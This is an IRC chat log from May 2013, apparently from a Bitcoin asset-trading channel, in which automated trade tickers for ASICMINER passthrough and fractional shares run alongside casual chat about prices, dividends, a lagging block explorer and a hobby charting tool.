[ASICMINER-PT] 11 @ 1.27698 = 14.0468 BTC [+] May 08 05:59:43 Cutting them up into tiny shares was pretty smart, TAT. Now people can put their last crumbs of BTC into it May 08 06:00:21 tslb at 3 hours now :P May 08 06:01:16 [BTCTC] [ASICMINER-PT] 4 @ 1.27698 = 5.1079 BTC [+] May 08 06:01:30 [BTCTC] [ASICMINER-PT] 4 @ 1.278 = 5.112 BTC [+] May 08 06:04:07 [BTCTC] [ASICMINER-PT] 1 @ 1.285 BTC [+] May 08 06:04:18 [BTCTC] [ASICMINER-PT] 1 @ 1.29 BTC [+] May 08 06:06:01 [BTCTC] [ASICMINER-PT] 4 @ 1.292999 = 5.172 BTC [+] May 08 06:07:54 [BTCTC] [ASICMINER-PT] 4 @ 1.292999 = 5.172 BTC [+] May 08 06:09:24 [BTCTC] [PAJKA.BOND] 1 @ 0.107999 BTC [+] May 08 06:09:51 how many shares of asicminer and its passthru are there? May 08 06:09:54 1000 on the pt? May 08 06:12:00 [HAVELOCK] [SDICE] 1 @ 0.319 BTC [+] May 08 06:12:39 there re 198k odd of underlying in the wild (out of 400k total, balance owned by issuer) May 08 06:13:05 sorry, was dealing with mining rigs May 08 06:13:13 i think less than that are in the wild May 08 06:13:18 they didnt sell the whole IPO May 08 06:13:19 might be less actually, maybe 40k didnt sell May 08 06:13:23 yeah May 08 06:13:46 passthroughs I think just add more as they are ableto May 08 06:14:12 yep, once I get enough sold, I'll end up buying more May 08 06:14:24 wouldnt be surprised if most shares end up on the PTs May 08 06:14:33 othe rthan board seats May 08 06:15:18 well I've been holding out for AM to make a platform which doesn't seem to be a priority May 08 06:15:24 so hit me up :) May 08 06:16:01 I'd rather go OTC as I can't be fucked signing up with the PT exchanges May 08 06:16:03 [BTCTC] [ASICMINER-PT] 1 @ 1.295 BTC [+] May 08 06:16:10 [MPEX] [S.MPOE] 16600 @ 0.00075435 = 12.5222 BTC [+] May 08 06:16:29 doesnt hurt to be paranoid i guess May 08 06:16:31 actually i did have a btctccttctcct or whatever acct but it vanished May 08 06:16:36 i wasnt around for the old fuckups May 08 06:16:47 so i'm probly not as paranoid as i should be May 08 06:17:02 i was a bitfloor user however May 08 06:17:22 but loss was tiny, just the cost of running up the butocin price a little to get out May 08 06:17:30 bitcoin* May 08 06:17:40 i'll buy asicminer closer to 1 May 08 06:17:44 nefario still owes me bitcoin :) May 08 06:17:54 [BTCTC] [TAT.ASICMINER] 80 @ 0.01265 = 1.012 BTC [+] May 08 06:19:48 asicminer will be tricky to find the best buy/sell point long-term May 08 06:19:54 friedcat keeps pulling aces May 08 06:19:57 what the frick..market prices going down down May 08 06:20:11 huh? May 08 06:20:15 you mean gox price? May 08 06:20:30 gox and btc-e that i can see May 08 06:20:38 you watch the price too much May 08 06:20:45 gonna give yourself grey hairs May 08 06:21:01 i know about that, im trying some python routines May 08 06:21:09 just pissing me off atm May 08 06:21:44 it dropped like $2... May 08 06:21:49 i want to see one thing and i see another every time i run tests..i might as well just go outside and smoke May 08 06:23:12 it's been on an uptrend for 12 hours, a smoke break won't kill you May 08 06:23:16 ... or will it? May 08 06:23:18 dun dun dun May 08 06:24:54 [BTCTC] [TAT.ASICMINER] 15 @ 0.01265 = 0.1898 BTC [+] May 08 06:25:09 twitter is coinbase? May 08 06:25:30 myspace is coinlab May 08 06:25:49 no shit did not know that May 08 06:25:57 kidding May 08 06:26:04 i have no idea who runs what anymore May 08 06:26:25 generally, if the guys that used to do something cool do somehting new, it's lame May 08 06:26:52 and if they guys that tried to do something cool that was actually lame do something new, they sue gox May 08 06:27:01 its news like this that drives up market price right May 08 06:27:01 http://online.wsj.com/article/SB10001424127887323687604578469012375269952.html May 08 06:27:32 dunno, that kinda news is more likely to give VCs a boner for bitcoin May 08 06:27:46 and scammers a boner for BTC startups May 08 06:28:13 what a sesspool its become lol May 08 06:28:24 back in the day all i cared about were shares now this heh May 08 06:28:42 it's the natural order I guess May 08 06:28:45 i was looking at my old wallets the other day and almost shed a tear May 08 06:29:34 ;;tslb May 08 06:30:14 Time since last block: 3 hours, 30 minutes, and 10 seconds May 08 06:30:21 ;;ticker May 08 06:30:22 BTCUSD ticker | Best bid: 112.90001, Best ask: 114.19999, Bid-ask spread: 1.29998, Last trade: 114.19999, 24 hour volume: 128861.49863409, 24 hour low: 97.52000, 24 hour high: 115.30001, 24 hour vwap: 107.39235 May 08 06:30:37 I actually considered getting into bitcoin pretty early on, but told myself to check in when it was actually worth something. I'd kick myself if it weren't for the likelihood that I also wouldve gotten wrapped up in the pirate scandal and gox crash, etc May 08 06:31:05 tslb is not correct May 08 06:31:10 oh. May 08 06:31:25 ah gox crash wasnt a big deal May 08 06:31:25 ;;bc,blocks May 08 06:31:26 235080 May 08 06:31:28 i lost soem coins/usd May 08 06:31:30 and said fuck it May 08 06:31:41 and started spending btc on stupid shti like cascius coins and little 1 gram silver btc things May 08 06:31:53 and then i left liek 9 in my wallet and forgot about them until the other month May 08 06:32:12 now i have 2 first edition 1btc coins that are selling for absurd amounts, and 9 btc that i threw in to asic miner May 08 06:32:34 [BTCTC] [TAT.ASICMINER] 2 @ 0.01265 = 0.0253 BTC [+] May 08 06:32:43 looks like blockchain.info is stuck on block 235055 and blockexplorer.com & gribble shows 235080 May 08 06:33:19 fork ? May 08 06:33:21 blockchain.info's bitcoind must be hosed again or whatever May 08 06:33:54 i recall that happening a week or two ago May 08 06:33:56 mircea_popescu: they had a similar problem like maybe 3 weeks ago or so. May 08 06:34:06 ya true May 08 06:34:10 well i May 08 06:34:16 i'm off, so take it ezzy all May 08 06:34:20 night May 08 06:34:20 the chain that cried wolf May 08 06:34:25 nite May 08 06:34:42 [BTCTC] [GSDPT] 2 @ 0.00315 = 0.0063 BTC [+] **** BEGIN LOGGING AT Wed May 8 12:49:42 2013 May 08 12:49:50 -NickServ- You failed to identify in time for the nickname mircea_popescu **** ENDING LOGGING AT Wed May 8 12:50:00 2013 **** BEGIN LOGGING AT Wed May 8 12:51:12 2013 May 08 12:54:54 ;;ticker May 08 12:54:54 BTCUSD ticker | Best bid: 111.69489, Best ask: 111.69490, Bid-ask spread: 0.00001, Last trade: 111.69489, 24 hour volume: 125196.38078119, 24 hour low: 97.52000, 24 hour high: 116.77700, 24 hour vwap: 108.06318 May 08 13:06:46 Highstock is really nice May 08 13:07:16 I'm playing around graphing BTC-TC ASICMINER-PT with it May 08 13:11:42 [BTCTC] [BITVPS] 199 @ 0.001171 = 0.233 BTC [+] May 08 13:11:51 [BTCTC] [BITVPS] 1 @ 0.00117 BTC [-] May 08 13:12:01 [BTCTC] [BITVPS] 200 @ 0.00116 = 0.232 BTC [-] May 08 13:29:06 [BTCTC] [ASICMINER-PT] 1 @ 1.31 BTC [+] May 08 13:32:49 [BTCTC] [ASICMINER-PT] 1 @ 1.317 BTC [+] May 08 13:32:53 [BTCTC] [ASICMINER-PT] 1 @ 1.3175 BTC [+] May 08 13:34:06 [MPEX] [O.USD.P320T] 1000 @ 1.97133047 = 1971.3305 BTC [+] May 08 13:40:06 [BTCTC] [S.DICE-PT] 8 @ 0.002802 = 0.0224 BTC [-] May 08 13:41:10 [BTCTC] [S.DICE-PT] 20 @ 0.0028 = 0.056 BTC [-] May 08 13:41:20 [BTCTC] [S.DICE-PT] 200 @ 0.0028 = 0.56 BTC [-] May 08 13:42:12 [BTCTC] [S.DICE-PT] 200 @ 0.002762 = 0.5524 BTC [-] May 08 13:43:04 [BTCTC] [ASICMINER-PT] 1 @ 1.3175 BTC [+] May 08 14:06:37 ;;ticker May 08 14:06:38 BTCUSD ticker | Best bid: 111.70503, Best ask: 112.50000, Bid-ask spread: 0.79497, Last trade: 112.50000, 24 hour volume: 125036.46690085, 24 hour low: 97.52000, 24 hour high: 116.77700, 24 hour vwap: 108.07251 May 08 14:27:11 [MPEX] [O.USD.P320T] 1000 @ 1.97105486 = 1971.0549 BTC [-] May 08 14:31:51 [BTCTC] [ASICMINER-PT] 8 @ 1.3175 = 10.54 BTC [+] May 08 14:32:49 [BTCTC] [ASICMINER-PT] 2 @ 1.32 = 2.64 BTC [+] May 08 14:32:51 [BTCTC] [B.YABMC] 20 @ 0.0181 = 0.362 BTC [+] May 08 14:33:01 [BTCTC] [B.YABMC] 5 @ 0.018 = 0.09 BTC [-] May 08 15:05:49 [BTCTC] [TAT.ASICMINER] 70 @ 0.012825 = 0.8978 BTC [-] May 08 15:13:29 [BTCTC] [ASICMINER-PT] 1 @ 1.3275 BTC [+] May 08 15:13:41 [BTCTC] [ASICMINER-PT] 12 @ 1.3299 = 15.9588 BTC [+] May 08 15:30:04 is mircea here? May 08 15:30:24 or kako? May 08 15:31:46 http://www.reddit.com/r/Bitcoin/comments/1dxea6/nashx_persontoperson_exchange_nash_equilibrium/ May 08 15:37:41 [BTCTC] [ASICMINER-PT] 1 @ 1.3299 BTC [+] May 08 15:42:27 [BTCTC] [ASICMINER-PT] 1 @ 1.33 BTC [+] May 08 15:47:02 [HAVELOCK] [SDICE] 8 @ 0.30010001 = 2.4008 BTC [+] May 08 15:49:32 [BTCTC] [BITVPS] 2 @ 0.001147 = 0.0023 BTC [-] May 08 15:49:42 [BTCTC] [BITVPS] 200 @ 0.001147 = 0.2294 BTC [-] May 08 15:49:47 [BTCTC] [BITVPS] 45 @ 0.001144 = 0.0515 BTC [-] May 08 15:49:51 [BTCTC] [BITVPS] 50 @ 0.00113 = 0.0565 BTC [-] May 08 15:50:28 [BTCTC] [ASICMINER-PT] 1 @ 1.33 BTC [+] May 08 15:50:48 [BTCTC] [BITVPS] 1 @ 0.00112 BTC [-] May 08 15:50:52 [BTCTC] [BITVPS] 3 @ 0.001051 = 0.0032 BTC [-] May 08 15:50:56 [BTCTC] [BITVPS] 5 @ 0.001011 = 0.0051 BTC [-] May 08 15:51:01 [BTCTC] [BITVPS] 10 @ 0.0009 = 0.009 BTC [-] May 08 15:51:05 [BTCTC] [BITVPS] 10 @ 0.00082 = 0.0082 BTC [-] May 08 15:51:09 [BTCTC] [BITVPS] 10 @ 0.0008 = 0.008 BTC [-] May 08 15:51:26 [BTCTC] [BITVPS] 20 @ 0.00075 = 0.015 BTC [-] May 08 15:52:09 yeah someone posted about nashx earlier, looks interesting May 08 15:52:25 [BTCTC] [BITVPS] 1 @ 0.0007 BTC [-] May 08 15:52:52 seon might be the author/developer May 08 16:01:46 Something I've been working on using the BTC-TC API.. http://fnords.dontexist.com/amchart2 May 08 16:02:25 [MPEX] [O.USD.P320T] 1000 @ 1.96363278 = 1963.6328 BTC [-] May 08 16:08:35 [BTCTC] [ASICMINER-PT] 4 @ 1.33 = 5.32 BTC [+] May 08 16:09:41 [BTCTC] [TAT.ASICMINER] 150 @ 0.01285 = 1.9275 BTC [+] May 08 16:09:47 [BTCTC] [TAT.ASICMINER] 99 @ 0.012875 = 1.2746 BTC [+] May 08 16:09:58 [BTCTC] [TAT.ASICMINER] 51 @ 0.012875 = 0.6566 BTC [+] May 08 16:10:05 [BTCTC] [TAT.ASICMINER] 30 @ 0.0129 = 0.387 BTC [+] May 08 16:10:15 [BTCTC] [TAT.ASICMINER] 81 @ 0.0129 = 1.0449 BTC [+] May 08 16:14:27 [BTCTC] [TAT.ASICMINER] 2 @ 0.0129 = 0.0258 BTC [+] May 08 16:16:02 [HAVELOCK] [VTX] 3 @ 0.44 = 1.32 BTC [-] May 08 16:16:23 [BTCTC] [BITVPS] 1 @ 0.00094 BTC [+] May 08 16:16:35 [BTCTC] [BITVPS] 1 @ 0.00095 BTC [+] May 08 16:16:50 [BTCTC] [BITVPS] 1 @ 0.001 BTC [+] May 08 16:16:59 [BTCTC] [BITVPS] 206 @ 0.001049 = 0.2161 BTC [+] May 08 16:19:06 [BTCTC] [S.MPOE-PT] 1230 @ 0.00065 = 0.7995 BTC [+] May 08 16:24:31 [BTCTC] [BITVPS] 1 @ 0.00095 BTC [-] May 08 16:24:54 [BTCTC] [BITVPS] 1 @ 0.001 BTC [+] May 08 16:24:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.0129 BTC [+] May 08 16:28:53 [BTCTC] [BITVPS] 1 @ 0.00104 BTC [+] May 08 16:31:55 [BTCTC] [BITVPS] 1 @ 0.00121 BTC [+] May 08 16:32:09 [BTCTC] [BITVPS] 202 @ 0.001201 = 0.2426 BTC [-] May 08 16:32:50 [BTCTC] [BITVPS] 1 @ 0.001201 BTC [-] May 08 16:33:40 [BTCTC] [BITVPS] 30 @ 0.0012 = 0.036 BTC [-] May 08 16:34:28 oh nice parseval, highchartsJS May 08 16:34:28 looks nice May 08 16:36:55 [BTCTC] [BITVPS] 100 @ 0.00075 = 0.075 BTC [-] May 08 16:36:58 [BTCTC] [BITVPS] 20 @ 0.00075 = 0.015 BTC [-] May 08 16:37:08 [BTCTC] [BITVPS] 49 @ 0.0007 = 0.0343 BTC [-] May 08 16:37:15 [BTCTC] [BITVPS] 222 @ 0.00069 = 0.1532 BTC [-] May 08 16:37:47 Thanks May 08 16:38:35 [BTCTC] [S.BBET-PT] 28 @ 0.00199 = 0.0557 BTC [+] May 08 16:38:42 [BTCTC] [S.BBET-PT] 1 @ 0.00199 BTC [+] May 08 16:38:53 [BTCTC] [S.BBET-PT] 75 @ 0.00219 = 0.1643 BTC [+] May 08 16:39:07 [BTCTC] [S.BBET-PT] 39 @ 0.0023 = 0.0897 BTC [+] May 08 16:44:04 I want to add a bit to it, like a comparison line of the USD value over time as pulled from MtGox historical data, flags for dividends, and maybe a chart showing return rates May 08 16:44:33 And then make it dynamic for any stock on BTC-TC May 08 16:45:13 Whenever Bitfunder comes out with their API then I could take PT that exist on both exchanges and graph them together May 08 16:45:37 I think they already use highstock over there May 08 16:46:14 parseval why arent you doing mpex ? May 08 16:46:46 I don't have an mpex account :D May 08 16:47:24 soooo ? May 08 16:47:45 [BTCTC] [GSDPT] 26 @ 0.00315 = 0.0819 BTC [+] May 08 16:48:23 It's just a matter of focusing on what's useful to me first, then adding in the extra stuff later May 08 16:49:04 [BTCTC] [GSDPT] 365 @ 0.00317 = 1.1571 BTC [+] May 08 16:50:23 wherein "extra stuff" = most of the market. but anyways. May 08 16:50:36 [BTCTC] [BITVPS] 203 @ 0.001039 = 0.2109 BTC [+] May 08 16:50:44 [BTCTC] [BITVPS] 1 @ 0.00103 BTC [-] May 08 16:53:12 [BTCTC] [BITVPS] 29 @ 0.0012 = 0.0348 BTC [+] May 08 16:54:40 Maybe when I look to take it to a wider audience than myself I'll add it in May 08 16:55:32 [BTCTC] [BITVPS] 1 @ 0.0012 BTC [+] May 08 16:56:11 [BTCTC] [BITVPS] 30 @ 0.00115 = 0.0345 BTC [-] May 08 16:56:17 [BTCTC] [BITVPS] 222 @ 0.001101 = 0.2444 BTC [-] May 08 17:02:37 [MPEX] [S.MPOE] 4321 @ 0.00071001 = 3.068 BTC [-] May 08 17:02:38 [MPEX] [S.MPOE] 4321 @ 0.00071001 = 3.068 BTC [-] May 08 17:02:40 [MPEX] [S.MPOE] 9000 @ 0.00071 = 6.39 BTC [-] May 08 17:02:41 [MPEX] [S.MPOE] 8052 @ 0.00070985 = 5.7157 BTC [-] May 08 17:16:59 [BTCTC] [BTC-BOND] 18 @ 0.01 = 0.18 BTC [-] May 08 17:17:09 [BTCTC] [BTC-BOND] 40 @ 0.009999 = 0.4 BTC [-] May 08 17:17:18 [BTCTC] [BTC-BOND] 25 @ 0.00999 = 0.2498 BTC [-] May 08 17:18:11 [BTCTC] [S.DICE-PT] 500 @ 0.003 = 1.5 BTC [+] May 08 17:18:35 [BTCTC] [BITVPS] 50 @ 0.00105 = 0.0525 BTC [-] May 08 17:18:37 [BTCTC] [S.DICE-PT] 4 @ 0.002765 = 0.0111 BTC [-] May 08 17:18:41 [BTCTC] [S.DICE-PT] 216 @ 0.002765 = 0.5972 BTC [-] May 08 17:18:56 [BTCTC] [BITVPS] 222 @ 0.001099 = 0.244 BTC [+] May 08 17:19:35 [BTCTC] [ASICMINER-PT] 1 @ 1.337 BTC [+] May 08 17:34:09 [BTCTC] [GSDPT] 10 @ 0.00317 = 0.0317 BTC [+] May 08 17:37:52 [BTCTC] [S.MPOE-PT] 1000 @ 0.00069 = 0.69 BTC [+] May 08 17:43:03 [BTCTC] [ASICMINER-PT] 1 @ 1.290001 BTC [-] May 08 17:43:15 [BTCTC] [ASICMINER-PT] 1 @ 1.29 BTC [-] May 08 17:43:20 [BTCTC] [ASICMINER-PT] 1 @ 1.28 BTC [-] May 08 17:46:39 http://i.imgur.com/0hgLB4N.jpg May 08 17:48:21 [BTCTC] [ASICMINER-PT] 1 @ 1.28 BTC [-] May 08 17:48:31 [BTCTC] [ASICMINER-PT] 2 @ 1.275 = 2.55 BTC [-] May 08 17:48:42 [BTCTC] [ASICMINER-PT] 1 @ 1.2721 BTC [-] May 08 17:48:51 [BTCTC] [ASICMINER-PT] 2 @ 1.272 = 2.544 BTC [-] May 08 17:51:49 [BTCTC] [ASICMINER-PT] 1 @ 1.3498 BTC [+] May 08 17:52:00 [BTCTC] [ASICMINER-PT] 3 @ 1.3499 = 4.0497 BTC [+] May 08 17:52:04 [BTCTC] [ASICMINER-PT] 1 @ 1.35 BTC [+] May 08 17:52:11 [BTCTC] [ASICMINER-PT] 3 @ 1.35 = 4.05 BTC [+] May 08 17:54:41 [MPEX] [O.USD.P320T] 1000 @ 1.92359798 = 1923.598 BTC [-] May 08 17:55:23 [BTCTC] [ASICMINER-PT] 1 @ 1.3 BTC [-] May 08 17:55:33 [BTCTC] [ASICMINER-PT] 3 @ 1.2711 = 3.8133 BTC [-] May 08 17:55:48 [BTCTC] [ASICMINER-PT] 1 @ 1.271001 BTC [-] May 08 17:55:58 [BTCTC] [ASICMINER-PT] 9 @ 1.271 = 11.439 BTC [-] May 08 17:56:07 TAT.ASICMINER Dividends have been paid May 08 17:56:55 [BTCTC] [TAT.ASICMINER] 16 @ 0.0129 = 0.2064 BTC [+] May 08 17:57:10 [BTCTC] [TAT.ASICMINER] 20 @ 0.0129 = 0.258 BTC [+] May 08 17:57:21 [BTCTC] [TAT.ASICMINER] 55 @ 0.0129 = 0.7095 BTC [+] May 08 17:58:28 On BTCTC? I don't see it May 08 17:58:51 Maybe it takes the history a bit to catch up May 08 17:59:15 Not on BTCT yet May 08 17:59:21 figuring out his sytem May 08 17:59:24 will be paid shortly May 08 17:59:58 [BTCTC] [ASICMINER-PT] 3 @ 1.2711 = 3.8133 BTC [+] May 08 18:00:38 [BTCTC] [ASICMINER-PT] 1 @ 1.271001 BTC [-] May 08 18:00:52 [BTCTC] [ASICMINER-PT] 10 @ 1.271 = 12.71 BTC [-] May 08 18:03:47 anyone have the BSK meeting notes i linked yesterday May 08 18:03:54 berkshire hathaway May 08 18:04:03 wsj transcribed it but i lost the link May 08 18:05:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.013 BTC [+] May 08 18:06:26 TAT.ASICMINER Dividends have been paid on BTCT.co as well May 08 18:14:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.013 BTC [+] May 08 18:33:19 [MPEX] [S.DICE] 400 @ 0.003001 = 1.2004 BTC [-] May 08 18:41:02 [MPEX] [S.MPOE] 4321 @ 0.00070944 = 3.0655 BTC [-] May 08 18:41:04 [MPEX] [S.MPOE] 5600 @ 0.00070943 = 3.9728 BTC [-] May 08 18:41:04 [MPEX] [S.MPOE] 10950 @ 0.00070914 = 7.7651 BTC [-] May 08 18:41:05 [MPEX] [S.MPOE] 1829 @ 0.00070757 = 1.2941 BTC [-] May 08 18:44:31 [BTCTC] [TAT.ASICMINER] 9 @ 0.012925 = 0.1163 BTC [-] May 08 18:45:54 [BTCTC] [BITVPS] 1 @ 0.00091 BTC [-] May 08 18:45:58 [BTCTC] [BITVPS] 49 @ 0.0009 = 0.0441 BTC [-] May 08 18:46:17 [BTCTC] [ASICMINER-PT] 1 @ 1.2901 BTC [+] May 08 18:46:24 [BTCTC] [ASICMINER-PT] 1 @ 1.29 BTC [-] May 08 18:58:55 [BTCTC] [ASICMINER-PT] 1 @ 1.319999 BTC [+] May 08 19:00:34 [BTCTC] [ASICMINER-PT] 19 @ 1.32 = 25.08 BTC [+] May 08 19:05:19 [BTCTC] [ASICMINER-PT] 1 @ 1.3295 BTC [+] May 08 19:08:32 http://www.avc.com/a_vc/2013/05/off-the-schneid.html May 08 19:13:27 [BTCTC] [ASICMINER-PT] 1 @ 1.301 BTC [-] May 08 19:13:33 [BTCTC] [ASICMINER-PT] 1 @ 1.300001 BTC [-] May 08 19:15:12 [BTCTC] [ASICMINER-PT] 10 @ 1.325 = 13.25 BTC [+] May 08 19:15:58 [BTCTC] [ASICMINER-PT] 1 @ 1.301001 BTC [-] May 08 19:17:59 [BTCTC] [ASICMINER-PT] 3 @ 1.3 = 3.9 BTC [-] May 08 19:22:48 kakobrekla lolk May 08 19:25:10 https://twitter.com/Mircea_Popescu/status/332169274997235713 May 08 19:25:11 thar. May 08 19:31:35 [BTCTC] [TAT.ASICMINER] 3 @ 0.012925 = 0.0388 BTC [-] May 08 19:37:09 [BTCTC] [ASICMINER-PT] 1 @ 1.337999 BTC [+] May 08 19:38:29 [BTCTC] [ASICMINER-PT] 1 @ 1.345 BTC [+] May 08 19:38:57 [BTCTC] [ASICMINER-PT] 1 @ 1.345 BTC [+] May 08 19:43:32 [MPEX] [O.USD.P320T] 1000 @ 1.8924443 = 1892.4443 BTC [-] May 08 19:43:55 [BTCTC] [TAT.ASICMINER] 4 @ 0.012925 = 0.0517 BTC [-] May 08 19:45:34 in vain May 08 19:47:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.012925 BTC [-] May 08 19:49:52 [BTCTC] [ASICMINER-PT] 2 @ 1.325 = 2.65 BTC [-] May 08 19:50:05 [BTCTC] [ASICMINER-PT] 1 @ 1.320001 BTC [-] May 08 19:50:21 [BTCTC] [BASIC-MINING] 1 @ 0.414499 BTC [+] May 08 19:50:30 [BTCTC] [ASICMINER-PT] 1 @ 1.32 BTC [-] May 08 19:50:44 someone is selling a lot of puts again May 08 19:52:14 kakobrekla at least he won't be able to say that "nobody knew" May 08 19:52:26 ;;google nobody could have imagined they'd use a plane as a rocket May 08 19:52:28 Why do some planes leave long trails, but others don't? - Contrail ...: ; Russia/China To Join Building 275~350-seater Plane — Civil ...: ; Apollo mission rocket engines recovered – Light Years - CNN.com ...: (1 more message) May 08 19:52:41 nice, the rice ho is all forgotten already. May 08 19:52:46 it's onyl been a decade. May 08 19:53:59 [BTCTC] [ASICMINER-PT] 1 @ 1.315 BTC [-] May 08 19:54:02 [HAVELOCK] [VTX] 1 @ 0.4645 BTC [+] May 08 19:54:04 chemtrail May 08 19:54:04 [HAVELOCK] [VTX] 10 @ 0.4648 = 4.648 BTC [+] May 08 19:54:05 [BTCTC] [ASICMINER-PT] 1 @ 1.3111 BTC [-] May 08 19:54:11 s May 08 19:56:32 * RICE CLAIM: "I don't think anybody could have predicted that they would try to use an airplane as a missile, a hijacked airplane as a missile." National Security Adviser Condoleezza Rice, 5/16/02 May 08 19:56:57 hehe May 08 19:57:22 mircea_popescu, relevant: https://www.youtube.com/watch?v=CL4ojwNaDNw May 08 19:57:29 [BTCTC] [BASIC-MINING] 2 @ 0.414499 = 0.829 BTC [+] May 08 20:00:34 [BTCTC] [BASIC-MINING] 1 @ 0.414499 BTC [+] May 08 20:02:55 [BTCTC] [TAT.ASICMINER] 24 @ 0.012925 = 0.3102 BTC [-] May 08 20:06:17 [BTCTC] [ASICMINER-PT] 1 @ 1.3399 BTC [+] May 08 20:07:20 [BTCTC] [TAT.ASICMINER] 59 @ 0.012925 = 0.7626 BTC [-] May 08 20:09:20 [BTCTC] [ASICMINER-PT] 1 @ 1.348879 BTC [+] May 08 20:09:47 I bet that unofficial announcement thread, coupled with the nice dividend today, will gain some traction for AM May 08 20:09:55 [BTCTC] [ASICMINER-PT] 1 @ 1.34888 BTC [+] May 08 20:10:41 it's already overbought. May 08 20:11:37 [BTCTC] [COGNITIVE] 5 @ 0.25 = 1.25 BTC [+] May 08 20:12:29 Maybe, but I bet we can hit higher peak before it sells off May 08 20:13:01 [BTCTC] [TAT.ASICMINER] 100 @ 0.01295 = 1.295 BTC [+] May 08 20:13:31 maybe. May 08 20:18:51 [BTCTC] [S.MPOE-PT] 50 @ 0.000695 = 0.0348 BTC [+] May 08 20:19:06 [BTCTC] [S.MPOE-PT] 29 @ 0.000697 = 0.0202 BTC [+] May 08 20:19:17 !ticker h sdice May 08 20:19:19 [HAVELOCK:SDICE] 1D: 0.30000000 / 0.30267031 / 0.31900000 (128 shares, 38.74180003 BTC), 7D: 0.24000000 / 0.29658679 / 0.33459979 (537 shares, 159.26710508 BTC), 30D: 0.12500000 / 0.30301842 / 0.42700000 (4668 shares, 1414.49000685 BTC) May 08 20:19:19 [BTCTC] [S.MPOE-PT] 324 @ 0.000698 = 0.2262 BTC [+] May 08 20:19:35 [BTCTC] [S.MPOE-PT] 500 @ 0.000699 = 0.3495 BTC [+] May 08 20:19:57 [BTCTC] [TAT.ASICMINER] 5 @ 0.012975 = 0.0649 BTC [+] May 08 20:19:58 [BTCTC] [S.MPOE-PT] 50 @ 0.0007 = 0.035 BTC [+] May 08 20:20:05 [BTCTC] [S.MPOE-PT] 47 @ 0.0007 = 0.0329 BTC [+] May 08 20:20:46 [BTCTC] [TAT.ASICMINER] 95 @ 0.012975 = 1.2326 BTC [+] May 08 20:21:19 [BTCTC] [TAT.ASICMINER] 5 @ 0.013 = 0.065 BTC [+] May 08 20:22:33 I'll have a new asset announcement later today probably :) May 08 20:22:35 [BTCTC] [ASICMINER-PT] 1 @ 1.2 BTC [-] May 08 20:23:16 [BTCTC] [ASICMINER-PT] 1 @ 1.320001 BTC [+] May 08 20:23:27 [BTCTC] [ASICMINER-PT] 1 @ 1.32 BTC [-] May 08 20:23:34 [BTCTC] [ASICMINER-PT] 1 @ 1.315 BTC [-] May 08 20:25:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.013 BTC [+] May 08 20:28:21 [BTCTC] [ASICMINER-PT] 2 @ 1.325 = 2.65 BTC [+] May 08 20:28:25 [BTCTC] [ASICMINER-PT] 1 @ 1.321 BTC [-] May 08 20:28:55 [BTCTC] [ASICMINER-PT] 1 @ 1.321 BTC [-] May 08 20:29:16 [BTCTC] [TAT.ASICMINER] 12 @ 0.013 = 0.156 BTC [+] May 08 20:32:40 [BTCTC] [TAT.ASICMINER] 7 @ 0.013 = 0.091 BTC [+] May 08 20:32:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.01279 BTC [-] May 08 20:32:48 [BTCTC] [TAT.ASICMINER] 8 @ 0.01271 = 0.1017 BTC [-] May 08 20:34:54 Nice, congrats and good luck, TAT May 08 20:37:37 lol theres trollbox archive http://trollboxarchive.com/byid.php?id=3778317 May 08 20:37:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.0131 BTC [+] May 08 20:40:43 what is tat.asicminer May 08 20:40:48 i need more asicminer May 08 20:43:00 it is fractional shares May 08 20:43:06 1/100 of a share May 08 20:43:19 please read the full description for details May 08 20:43:37 it exists on both BTCT and Bitfunder May 08 20:44:20 [BTCTC] [TAT.ASICMINER] 5 @ 0.0131 = 0.0655 BTC [+] May 08 20:44:43 i got it May 08 20:44:45 read it May 08 20:45:47 love it May 08 20:49:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.013099 BTC [-] May 08 20:50:25 [BTCTC] [TAT.ASICMINER] 2 @ 0.013099 = 0.0262 BTC [-] May 08 20:50:53 [BTCTC] [ASICMINER-PT] 3 @ 1.322 = 3.966 BTC [+] May 08 20:57:18 [BTCTC] [S.DICE-PT] 13 @ 0.002775 = 0.0361 BTC [+] May 08 21:03:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.0129 BTC [-] May 08 21:03:40 [BTCTC] [GSDPT] 5 @ 0.00295 = 0.0148 BTC [-] May 08 21:07:43 [BTCTC] [ASICMINER-PT] 1 @ 1.33 BTC [+] May 08 21:08:03 [HAVELOCK] [HIM] 2 @ 2.01 = 4.02 BTC [+] May 08 21:10:03 [BTCTC] [TAT.ASICMINER] 2 @ 0.01273 = 0.0255 BTC [-] May 08 21:12:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.013099 BTC [+] May 08 21:14:51 [BTCTC] [PAJKA.BOND] 1 @ 0.1075 BTC [+] May 08 21:16:40 i liked that coinbase is myspace comment from yesterday May 08 21:16:44 made me teh chuckles May 08 21:19:31 :) May 08 21:19:40 i do it for the lulz May 08 21:19:48 not really... May 08 21:20:17 [BTCTC] [ASICMINER-PT] 1 @ 1.324 BTC [-] May 08 21:20:31 [BTCTC] [ASICMINER-PT] 1 @ 1.321 BTC [-] May 08 21:32:13 [BTCTC] [TAT.ASICMINER] 4 @ 0.013099 = 0.0524 BTC [+] May 08 21:32:24 [BTCTC] [TAT.ASICMINER] 36 @ 0.0131 = 0.4716 BTC [+] May 08 21:34:28 [BTCTC] [TAT.ASICMINER] 2 @ 0.0131 = 0.0262 BTC [+] May 08 21:50:58 [BTCTC] [ASICMINER-PT] 1 @ 1.341999 BTC [+] May 08 21:51:16 [BTCTC] [ASICMINER-PT] 1 @ 1.3487 BTC [+] May 08 21:51:22 [BTCTC] [ASICMINER-PT] 1 @ 1.3497 BTC [+] May 08 21:51:27 [BTCTC] [ASICMINER-PT] 3 @ 1.3498 = 4.0494 BTC [+] May 08 21:51:55 [BTCTC] [ASICMINER-PT] 13 @ 1.3498 = 17.5474 BTC [+] May 08 21:52:18 [BTCTC] [ASICMINER-PT] 27 @ 1.35 = 36.45 BTC [+] May 08 21:55:09 [BTCTC] [TAT.ASICMINER] 50 @ 0.01315 = 0.6575 BTC [+] May 08 21:56:43 [BTCTC] [ASICMINER-PT] 1 @ 1.3889 BTC [+] May 08 